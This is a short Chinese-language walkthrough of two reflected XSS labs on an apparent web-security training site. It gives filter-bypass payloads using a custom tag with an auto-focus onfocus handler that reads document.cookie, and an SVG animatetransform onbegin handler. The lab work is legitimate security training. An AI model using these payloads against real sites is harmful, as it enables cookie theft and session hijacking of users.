阻止除自定義標簽之外的所有標簽

先輸入一些標簽測試，說是全部標簽都被禁了

除了自定義的

自定義<my-tag onmouseover=alert('xss')>

<my-tag id=x onfocus=alert(document.cookie) tabindex=1>

onfocus 當元素獲得焦點時（如通過點擊或鍵盤導航），觸發 alert(document.cookie)，彈窗顯示當前頁面的Cookie信息。

id=x為元素分配唯一標識符，便于JavaScript或CSS操作。

tabindex=1使元素可通過鍵盤Tab鍵聚焦，從而更容易觸發 onfocus 事件。

https://0a4200f7037b125b813143f700db001d.web-security-academy.net/?search=%3Cmy-tag+id%3Dx+onfocus%3Dalert%28document.cookie%29+tabindex%3D1%3E#x最后加個#x

#是聚焦到對應的元素

允許使用一些 SVG 標記的反射型 XSS

先輸入基礎標簽<h1>test</h1>測試，發現依舊存在攔截

繼續爆破，經過測試這四個 tags 可以使用

測試 event 中只有onbegin可以用

結合起來<svg><animatetransform onbegin=alert(1)>

animatetransform 是用來加載動畫效果的，onbegin 是開始加載時觸發 alert

?

echo "QmlsaWJpbGkgc2VhcmNoICdQZW5UZXN0M3JfWmVybGsnIGZvciBtb3JlIHZpZGVvLCBUaGFuayB5
b3UgZm9yIHlvdXIgc3VwcG9ydCEK"|base64 -d